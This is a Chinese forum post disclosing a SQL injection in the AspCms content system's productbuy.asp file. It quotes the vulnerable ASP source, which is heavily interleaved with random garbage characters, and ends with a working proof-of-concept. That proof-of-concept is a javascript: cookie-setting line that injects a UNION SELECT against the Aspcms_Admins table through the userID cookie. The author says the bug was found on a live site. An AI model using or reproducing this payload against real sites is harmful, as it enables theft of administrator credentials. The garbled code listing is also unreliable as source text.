好久没上土司了,上来一看发现在删号名单内.....
也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。
废话不多说,看代码:
7 s, F5 {/ q* q* g6 H6 r7 z# V" s2 r; G+ p2 o6 [" w, \4 A
<%* K- i( l. i4 t( Q, k4 ]* L/ B
5 _$ r. i9 N1 [# M, y6 [
if action = "buy" then
- ?! s& H- E; i. E( b, k G
+ @8 f1 C3 F4 b. u: P, D addOrder()
) S7 e* R. Q( B. k- f2 Z
2 l- R( t: u: ~ t$ Z. qelse
+ \) v6 ^) E% w* T- C+ ?: l0 T7 t1 }7 W, G) i
echoContent()
5 [. h( I! X1 w6 b7 [
8 U" h6 R/ h) n" uend if
7 ^) B0 b, t* _1 Q/ d6 P. X) h2 D5 ?9 F Q( y
% I" c) F$ M$ P3 o- ?1 x0 y
……略过
7 f% r( g; ?8 C+ R: ~% B; D) F
7 Q7 D6 {2 l3 A* e) T
0 ? e+ _: U) h% B0 Y! w( _# f
Sub echoContent()8 e2 ]3 L' t% u# T& P$ U
: p5 n1 a3 E" _4 J( H3 w: }
dim id
- j1 M* h. y2 ^; B& _, p( h+ c
: T \' r4 G/ { id=getForm("id","get"): O% b7 ?3 [3 s: S3 J
0 w4 @# U! M2 \& j$ v' b
; }) c3 R1 F6 d* m- E, v, s# i
9 C1 D1 [3 k" `9 L" [. F: e if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1" ' F ]9 x' l, l! p) D6 Q: B
7 S3 y g) n. x6 g# P
1 ~! I. L7 z7 v2 B+ o( W0 A4 n" p2 N, f* C8 L/ t# v) B' {
dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")! O8 Y6 M) D! n
' c- S/ Q3 @& b" \7 @ dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct
4 w k! u& p) Z8 ]( d; n8 j5 x% G ?* V D8 W" M
Dim templatePath,tempStr+ L* `; i( j: O. X' y9 w
* b+ y' R6 s4 L: v6 O+ Q' p
templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"0 k; ~, \. f- [' z) f' h9 b' h
9 `1 n5 Y/ [ m8 \/ ?% P5 u( k1 ^# Y& f( R8 Y
2 g# O) s, Z0 x3 m# e
set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
9 u1 q [9 q2 z+ e: F& t+ k
+ k4 f5 Z+ f* R. s& p- {. K selectproduct=rsObj(0)6 S* ]3 |" J) e9 Q
! ]6 R4 u& i9 R8 R6 @6 o
* s! V3 c+ \. N5 \
$ o- @# ]* p" t2 ^* ~. T& V& b Dim linkman,gender,phone,mobile,email,qq,address,postcode4 o0 j5 i9 Q! _: X: @+ h* j
1 E# a$ i% Z& Z/ Q
if isnul(rCookie("loginstatus")) then wCookie"loginstatus",00 K4 I2 P& l! R& d. \' ^& N
- D, n% M( o+ U) M
if rCookie("loginstatus")=1 then ' w; w, Z4 _9 b& n" n9 @/ j
0 ]* i* Y# n1 t- C& S/ ?9 E* v( J+ C set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")# |. f6 y& b2 K3 H3 q- [; e! f& N5 d" g+ u
9 M6 W! e2 D/ E) Z linkman=rsObj("truename")# X$ ~# _! m. I% f
5 u: V- c- b8 `9 v
gender=rsObj("gender") D U# u, O* h2 u V8 ^5 N( k
3 B+ G" O, Q+ L: n
phone=rsObj("phone")
% C' N( L) d+ f9 ~- C
" P+ N. A/ v' \9 _- L' X mobile=rsObj("mobile")- _. G* [4 N8 w' t' v8 B' d
, W' f+ G/ B! P5 e% u6 H
email=rsObj("email")9 q4 V; L. s; ^2 J; V% m3 y; t
9 {+ n2 O: r' |8 x M5 k1 ^
qq=rsObj("qq")4 N) r6 g& t- Y0 M$ T4 B1 U
* m0 z4 @% O$ ]! q' K
address=rsObj("address")) x0 B2 j! G: w) _3 ]
' O1 m$ z4 o. H9 K
postcode=rsObj("postcode")
" O' _, ~/ a% ]6 X+ |/ Y9 G) G6 x0 h% l! y" k- C
else
' X. I# R- c3 ?' m7 \/ j8 [+ q+ }! e0 {6 K& I; y' {+ s
gender=1
: r. T) N, e0 X4 w6 t3 ] K' |; [) K1 [; x5 y7 ^3 h* O% | @6 r
end if# A- F3 X" h5 q5 L3 `1 o
+ k' D9 e6 B8 V- g) T rsObj.close()
) c/ @, I2 b+ @, r! k; U+ r, x1 g" p P
. Y1 f# h% K. t0 {8 R6 r# Q) j ]: E$ e/ o- z' X" S
with templateObj
2 l' d5 |/ E' R0 y# T7 h3 m! U7 @" M$ `* D' s5 ]+ O
.content=loadFile(templatePath) 8 d9 m! E. b2 T/ l% s
6 \+ n v( A, e. S7 D .parseHtml()
& }% }' S9 { Q* y7 a# Z/ X$ S+ w+ W' a9 i
.content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)" R' B& [* M$ w) Y+ {! D
6 F" O4 q& t# i- q; ~* v" | .content=replaceStr(.content,"[aspcms:linkman]",linkman) ) T) b" s9 t6 T2 Y$ C
( j( b1 b- ^0 n$ I7 A5 w
.content=replaceStr(.content,"[aspcms:gender]",gender)
; p: I( r, @4 z" I
" z, ~; ~# ~; \ .content=replaceStr(.content,"[aspcms:phone]",phone)
' p! L# h( y, W9 M
$ e$ [* A+ J/ ^, z; p2 ? .content=replaceStr(.content,"[aspcms:mobile]",mobile)
5 O( v4 g) D* p
, k4 j& r7 r& s+ O .content=replaceStr(.content,"[aspcms:email]",email) 9 q1 Q! b5 l; t7 t
( F! [! u, @) P8 F' s0 `1 u
.content=replaceStr(.content,"[aspcms:qq]",qq)
4 O# @" _9 m# g. K+ m; {' Q7 v/ G% S* u$ p0 V! F$ e
.content=replaceStr(.content,"[aspcms:address]",address)
; @* K0 B% E+ T% A' {
' d8 ]2 q; Y @+ l4 J .content=replaceStr(.content,"[aspcms:postcode]",postcode)
. L& d. Y: s( g5 h" d- L7 g7 u& E2 h4 V5 j$ C) j1 @% O- k8 g' \7 D
.parseCommon() # q( c; O. E3 s: r1 S( f# S
# o8 E4 R$ I# c" B- w8 h
echo .content
1 c9 `$ e: I) j% t! P9 T5 S
) G3 k( ?. P9 C: z B8 `: C) A, T end with
/ x; F9 H. ]1 b0 B7 _* ]( ?: W2 z1 F j/ _: N
set templateobj =nothing : terminateAllObjects
- ~ e( C* R+ t! e( k7 Q6 ]: \
; H: u6 o6 k, BEnd Sub
漏洞很明显,没啥好说的
poc:
3 c$ m$ n( @ d- H: h% ^* t& d) D% F8 K- u
javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子
" m5 P! n6 M. p5 m# _: W7 b. s$ C5 K) O+ [# W% b0 |
|